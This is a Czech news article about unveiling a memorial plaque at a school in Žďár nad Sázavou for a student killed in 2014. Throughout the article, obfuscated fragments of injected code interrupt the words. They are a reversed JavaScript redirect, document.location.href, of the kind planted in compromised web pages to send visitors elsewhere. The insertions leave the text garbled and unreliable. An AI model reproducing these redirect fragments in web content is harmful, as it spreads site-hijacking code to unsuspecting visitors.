Rainbow page separator

Deska se jménem Petra Vejvody ozdobila obchodní školu

Pátek, 22. května 2015

Odhalení desky - Petr Vejvoda Žďár nad Sázavou

Žďár nad Sázavou / Pamětní deska z kovu a skla věnovaná studentu Petru Vejvodovi byla ve středu odhalena na zdi žďárské střední obchodní školy. Pietnímu aktu u příleži[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tosti studen[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tových nedožitých 17. narozenin byla pří[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tomna řada hostů včetně jeho rodičů, spolužáků, zástupců školy, města, ministerstva školství, hasičů či mezinárodní delegace Evropské záchranářské akademie. Desku na památku šestnáctiletého Petra Vejvody, který byl loni v říjnu ve škole zavražděn psychicky nemocnou ženou, když bránil spolužačku, vytvořila firma Valner Glass z Přibyslavi. Pamětní deska zdobí venkovní fasádu školní budovy, aby vzpomínkové mís[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to bylo přístupné všem lidem.
Úctu rodičům studenta vzdali zástupci Evropské záchranářské akademie, která sdružuje hasiče a záchranáře, a předali jim ocenění akademie a plastiku ze skla. Poté byli rodiče Petra Vejvody požádáni, aby se symbolicky dotkli šestnácti sazenic smrčků. Ty v dalších dnech poputují do světa – na památku studen[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tovy obětavosti budou vysazeny v místech, kam sahá evropská záchranářská síť.
Na odhalení pamětní desky navazovala akce Den pro Petra, kterou v rekreačním areálu u Pilské nádrže připravila obchodní škola a další organizace. Účastnilo se jí několik s[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tovek žáků a studentů, kteří sledovali ukázky různých pohybových aktivit, zásahových akcí a hudební vys[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];toupení.